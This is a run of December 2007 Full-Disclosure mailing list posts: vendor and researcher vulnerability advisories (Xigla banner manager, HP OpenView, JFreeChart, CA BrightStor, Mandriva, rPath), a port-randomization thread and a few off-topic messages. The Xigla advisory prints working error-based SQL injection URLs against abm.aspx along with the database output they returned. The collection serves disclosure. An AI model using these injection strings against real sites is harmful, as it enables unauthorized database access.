Can you determine the nature of the increase? Is it just spam/junk? I'm seeing a significant increase in my personal mail due to Spam/Junk mail just within the last week. We have a steady increase in mail since the beginning of October. The difference between then and now is about 23% more spam/junk mails. There are some days with high peaks, but I don't really worry about those days. I would start worrying when the sudden increase stays, and doesn't go down again. I suppose it has to do with the holidays coming up. A part of the new kind of spam/junk are mailings from locally based companies sending out their holiday gift promotions and such. I remember that last year, we had the same increase in mail, but once it was January, it rapidly decreased again. Regards, Sven. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HackerSafe Labs - Security Advisory - Xigla Absolute Banner Manager v4.0
HackerSafe Labs - Security Advisory http://www.hackersafelabs.com/ http://www.hackersafelabs.com/ Date: 12/06/2007 Vendor: http://www.xigla.com http://www.xigla.com Package: Xigla Absolute Banner Manager Versions: v4.0 Credit: Joseph Pierini - HackerSafe Labs Risk: Related Exploit Range: Remote Attack Complexity: Medium Level of Authentication Needed: Not Required Confidentiality Impact: Major Integrity Impact: Major Availability Impact: Major Overview: Absolute Banner Manager .NET is a feature packed Ad Tracking and Banner Management software specially developed for the webmaster looking for a scalable, flexible and reliable Banner Ad Serving front-end tool. Vulnerabilities: A SQL injection exists in the Windows version of the Xigla Absolute Banner Manager application. SQL Injection Page: abm.aspx SQL Injection Parameter: z= Examples: http://www.domainname.com/absolutebm/abm.aspx?z=@@version http://www.domainname.com/absolutebm/abm.aspx?z=@@version Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(in t,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20whe re%20xtype=char(85))) http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(i nt,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20wh ere%20xtype=char(85))) - Syntax error converting the varchar value 'dtproperties' to a column of data type int. Resolution Timeline: Vendor Notification: October 29, 2007 : '[EMAIL PROTECTED]' '[EMAIL PROTECTED]' Vendor Response: None Vendor Fix: None Public release of advisory: December 6, 2007 ScanAlert Responsible Disclosure Policy ScanAlert believes in the responsible disclosure of vulnerability information with a coordinated release with the vendor where possible. Except where active and/or trivial exploitation of the vulnerability is present, ScanAlert believes it is in the best interest of the community when the vendor participates in the process of disclosure and has sufficient time to respond effectively. If ScanAlert exhausts all reasonable means in order to contact a vendor, then ScanAlert may issue a public advisory disclosing its findings 15 business days after the initial contact. ScanAlert's mission is to make the web safe from hackers. We make web sites secure from hackers and certify it to their customers via our patent pending HACKER SAFE(r) security certification technology. Our daily security audits and real-time certification enables consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions Joseph Pierini, CISSP | Director, Enterprise Services ScanAlert ( www.scanalert.com) http://www.scanalert.com) [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] 877-302-9965 ext 1185 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TCP Port randomization paper
Folks, We have published a revision of our port randomization paper. This is the first revision of the document since it was accepted as a working group item of the tsvwg working group of the IETF (Internet Engineering Task Force). Any feedback on the proposed/described algorithms will be welcome. The document is available at: http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt Additionally, it is available in other fancy formats (PDF and HTML) at: http://www.gont.com.ar/drafts/port-randomization/index.html Thanks, -- Fernando Gont e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED] PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-07-071: HP OpenView Network Node Manager Multiple CGI Buffer Overflows
ZDI-07-071: HP OpenView Network Node Manager Multiple CGI Buffer Overflows http://www.zerodayinitiative.com/advisories/ZDI-07-071.html December 6, 2007 -- CVE ID: CVE-2007-6204 -- Affected Vendor: Hewlett-Packard -- Affected Products: OpenView Network Node Manager 7.51 and below -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 4790. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard (HP) OpenView Network Node Manager (NNM). Authentication is not required to exploit these vulnerabilities. The specific flaws exists within the CGI applications that handle the management of the NNM server. Due to lack of bounds checking during a call to sprintf(), sending overly long arguments to the various CGI variables result in a classic stack overflow leading to compromise of the remote server. Exploitation leads to code execution running under the credentials of the web server. Further techniques can be leveraged to gain full SYSTEM access. The following is a list of vulnerable CGI applications: - ovlogin.exe - OpenView5.exe - snmpviewer.exe - webappmon.exe -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found in HP Security Bulletin Document ID c01188923. -- Disclosure Timeline: 2006.10.10 - Vulnerability reported to vendor 2007.12.06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Tenable Network Security. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities
___ Rapid7 Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0031 JFreeChart Image Map Cross-Site Scripting Vulnerabilities Published: Dec 06, 2007 Revision: 1.0 http://www.rapid7.com/advisories/R7-0031.jsp 1. Affected system(s): KNOWN VULNERABLE: o JFreeChart 1.0.8 KNOWN FIXED: o JFreeChart 1.0.8 branch jfreechart-1.0.8-security 2. Summary JFreeChart is a popular Java-based chart library used to generate charts and graphs of data. The library includes support for generating HTML image maps, which allow for enhanced interaction of the chart via hyperlinks bound to shapes specified by coordinates. Multiple cross-site scripting vulnerabilities exist within the image map support functionality of JFreeChart which may allow an attacker to inject arbitrary HTML or JavaScript into any product or website which uses the library. 3. Vendor status and information JFreeChart Project http://sourceforge.net/projects/jfreechart/ The JFreeChart project was notified of this vulnerability on November 28th, 2007 via their online bug tracking system. The vulnerability was fixed on December 6th 2007 with a commit to their SVN repository. 4. Solution Upgrade to JFreeChart SVN repository revision 682 using branch jfreechart-1.0.8-security. See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/ for details. 5. Detailed analysis JFreeChart fails to properly escape the following properties of the generated image map: o The chart name. o The chart tool tip text. o The href attribute for a chart area. o The shape attribute for a chart area. o The coords attribute for a chart area. It is possible to inject custom HTML code into the code generated by the JFreeChart library. If a web server uses this library to generate charts from user-supplied data, an attacker could cause other users of the same website or application to execute arbitrary JavaScript code when viewing a page containing a chart. 6. Credit Discovered by Chad Loder of Rapid7. 7. Contact Information Rapid7, LLC Email: [EMAIL PROTECTED] Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup Multiple Vulnerabilities CA Vuln ID (CAID): 35724, 35725, 35726 CA Advisory Date: 2007-10-10 CA Advisory Updated: 2007-12-05 Reported By: Anonymous researcher working with the iDefense VCP (CVE-2007-5325) Dyon Balding of Secunia Research (CVE-2007-5326) Cocoruder of Fortinet Security Research Team (CVE-2007-5327) Tenable Network Security (CVE-2007-5328) Pedram Amini of DV Labs (dvlabs.tippingpoint.com) (CVE-2007-5329) Dyon Balding of Secunia Research (CVE-2007-5330) eEye Digital Security (CVE-2007-5331) shirkdog (CVE-2007-5332) Impact: A remote attacker can cause a denial of service, execute arbitrary code, or take privileged action. Summary: Multiple vulnerabilities exist in BrightStor ARCserve Backup that can allow a remote attacker to cause a denial of service, execute arbitrary code, or take privileged action. The first set of vulnerabilities, CVE-2007-5325, CVE-2007-5326, and CVE-2007-5327, occur due to insufficient bounds checking by multiple components. The second vulnerability, CVE-2007-5328, occurs due to privileged functions being available for use without proper authorization. The third set of vulnerabilities, CVE-2007-5329, CVE-2007-5330, CVE-2007-5331, and CVE-2007-5332, are due to a memory corruption occurring with the processing of RPC procedure arguments by multiple services. The vulnerabilities allow an attacker to cause a denial of service, or potentially to execute arbitrary code. Note: Updated patches are available. The original patches did not fully address some issues. Special thanks to Dyon Balding of Secunia and to Fortinet for reporting issues with the original patches. Mitigating Factors: None Severity: CA has given these vulnerabilities a maximum risk rating of High. Affected Products: BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup r11 for Windows BrightStor Enterprise Backup r10.5 BrightStor ARCserve Backup v9.01 CA Server Protection Suite r2 CA Business Protection Suite r2 CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 Affected Platforms: Windows Status and Recommendation: CA has issued the following patches to address the vulnerabilities. BrightStor ARCserve Backup r11.5 - QO92996 BrightStor ARCserve Backup r11.1, - QO92849 BrightStor ARCserve Backup r11.0 - Upgrade to 11.1 and apply the latest patches. BrightStor Enterprise Backup r10.5 - Upgrade to 11.5 and apply the latest patches. BrightStor ARCserve Backup v9.01 - QO92848 CA Protection Suites r2: QO92996 How to determine if you are affected: 1. Using Windows Explorer, locate the file “asdbapi.dll”. By default, the file is located in the “C:\Program Files\CA\BrightStor ARCserve Backup” directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file timestamp is earlier than indicated in the table below, the installation is vulnerable. Version File NameTimestampFile Size 11.5 asdbapi.dll 10/24/2007 08:43:08 1249354 bytes 11.1 asdbapi.dll 10/19/2007 17:56:00 856064 bytes 9.01 asdbapi.dll 10/19/2007 18:02:22 700416 bytes * For Protection Suites r2, follow instructions for BrightStor ARCserve Backup r11.5. Workaround: None References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ BrightStor ARCserve Backup Security Notice http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp Solution Document Reference APARs: QO92996, QO92849, QO92848, QO92996 CA Security Response Blog posting: New patches available to address CA BrightStor ARCserve Backup multiple vulnerabilities http://community.ca.com/blogs/casecurityresponseblog/archive/2007/12/05.asp x CA Vuln ID (CAID): 35724, 35725, 35726 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35724 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35725 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35726 Reported By: Anonymous researcher working with the iDefense VCP (CVE-2007-5325) http://labs.idefense.com/intelligence/vulnerabilities/ Dyon Balding of Secunia Research (CVE-2007-5326) CA BrightStor ARCserve Backup RPC String Buffer Overflow http://secunia.com/secunia_research/2007-49/advisory/ Cocoruder of Fortinet Security Research Team (CVE-2007-5327) Advisory: Vulnerability Affecting CA BrightStor ARCServe BackUp http://www.fortiguardcenter.com/advisory/FGA-2007-11.html Tenable Network Security (CVE-2007-5328) http://www.tenablesecurity.com/solutions/ http://www.zerodayinitiative.com/advisories/ZDI-07-069.html Pedram Amini of DV Labs (dvlabs.tippingpoint.com) (CVE-2007-5329) http://www.zerodayinitiative.com/advisories.html Dyon Balding of Secunia Research (CVE-2007-5330) CA BrightStor ARCserve
[Full-disclosure] [ MDKSA-2007:239 ] - Updated heimdal packages fix potential vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:239 http://www.mandriva.com/security/ ___ Package : heimdal Date: December 6, 2007 Affected: Corporate 4.0 ___ Problem Description: It was found that the gss_userok() function in Heimdal 0.7.2 did not allocate memory for the ticketfile pointer before calling free(), which could possibly allow remote attackers to have an unknown impact via an invalid username. It is uncertain whether or not this is exploitable, however packages are being provided regardless. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5939 ___ Updated Packages: Corporate 4.0: be6d53b523a2e480ad3c4ff5c06b3224 corporate/4.0/i586/heimdal-devel-0.7.2-8.1.20060mlcs4.i586.rpm 54bf58397e29abfde02df9136030d9f2 corporate/4.0/i586/heimdal-libs-0.7.2-8.1.20060mlcs4.i586.rpm fa75b430132836b44f23b381f11a52f3 corporate/4.0/i586/heimdal-server-0.7.2-8.1.20060mlcs4.i586.rpm f0dffddcb8aa0806c5e2da2f6e8c970e corporate/4.0/i586/heimdal-workstation-0.7.2-8.1.20060mlcs4.i586.rpm a1f928c65de872d4a289bc74a89a4edd corporate/4.0/SRPMS/heimdal-0.7.2-8.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: f4264a1969969c148229bf5a266f10cb corporate/4.0/x86_64/heimdal-devel-0.7.2-8.1.20060mlcs4.x86_64.rpm ac602c09873863c130a9b68dacfd26c8 corporate/4.0/x86_64/heimdal-libs-0.7.2-8.1.20060mlcs4.x86_64.rpm 61f2cb03ae15b3fe7e7a5dcab47a9c16 corporate/4.0/x86_64/heimdal-server-0.7.2-8.1.20060mlcs4.x86_64.rpm 9399188193c5d5018878f55328c72b09 corporate/4.0/x86_64/heimdal-workstation-0.7.2-8.1.20060mlcs4.x86_64.rpm a1f928c65de872d4a289bc74a89a4edd corporate/4.0/SRPMS/heimdal-0.7.2-8.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHWHZAmqjQ0CJFipgRAkLhAKDmRqNw/CCl8ZLulSHILtZkjDi03ACeOHty ikNN/kEekOyzRbj3EkX/C4c= =9mff -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0260-1 firefox
rPath Security Advisory: 2007-0260-1 Published: 2007-12-06 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/2.0.0.11-0.1-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1984 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5959 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5960 http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.11 Description: Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running firefox. http://wiki.rpath.com/Advisories:rPSA-2007-0260 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GOBBLE ALERT FOR PEOPLES !!
ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION Gobble decide to make one quick post to sex up the Matasano gate scandle .. The Link for our blog is http://turkeychargen.blogspot.com/ .. PS - We donot condone the recent DDoS on their website ... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google / GMail bug, all accounts vulnerable
Proof of concept here... http://www.kristian-hermansen.com -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TCP Port randomization paper
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Strangely enough this stuff exists for more than 3 years ... Think GRSEC and more specifically Network stack randomization. Well of course bow to IETF for accepting this for draft ... Fernando Gont wrote: Folks, We have published a revision of our port randomization paper. This is the first revision of the document since it was accepted as a working group item of the tsvwg working group of the IETF (Internet Engineering Task Force). Any feedback on the proposed/described algorithms will be welcome. The document is available at: http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt Additionally, it is available in other fancy formats (PDF and HTML) at: http://www.gont.com.ar/drafts/port-randomization/index.html Thanks, -- Fernando Gont e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED] PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Regards Vladimir Vitkov www.hoster.bg Marijuana will be legal some day, because the many law students who now smoke pot will someday become congressmen and legalize it in order to protect themselves. -- Lenny Bruce -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHWPMiXwMwnJIV9/cRAouqAJ9QA7beYDnzeApGc+FKQRKxPW0lYwCeMPuZ TjFGVXx3BumCXjlkFmt6V78= =Ci85 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] b0b27a223b66678f24aec254366526d7910d0f38679f6478804c7480d2271ce9 [was: TCP Port randomization paper]
On Dec 6, 2007 11:15 PM, Vladimir Vitkov [EMAIL PROTECTED] wrote: ... Strangely enough this stuff exists for more than 3 years ... Think GRSEC and more specifically Network stack randomization. ... and high throughput hardware entropy sources. (aka, /dev/urandom fun, seeding at boot, and /dev/random sucked dry) [ok, true entropy is overkill for port/isn selection when a secure prng (yarrow?) will suffice. but if you've got 100M/bps[0] on tap, why not spray freely over ephemeral port numbers and initial sequences...] best regards, 0. http://www.via.com.tw/en/initiatives/padlock/hardware.jsp VIA PadLock Security Engine (i'll leave the fun of coding a high throughput entropy daemon for /dev/random to the reader. unless you happen to have a copy of mtrngd laying around...) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/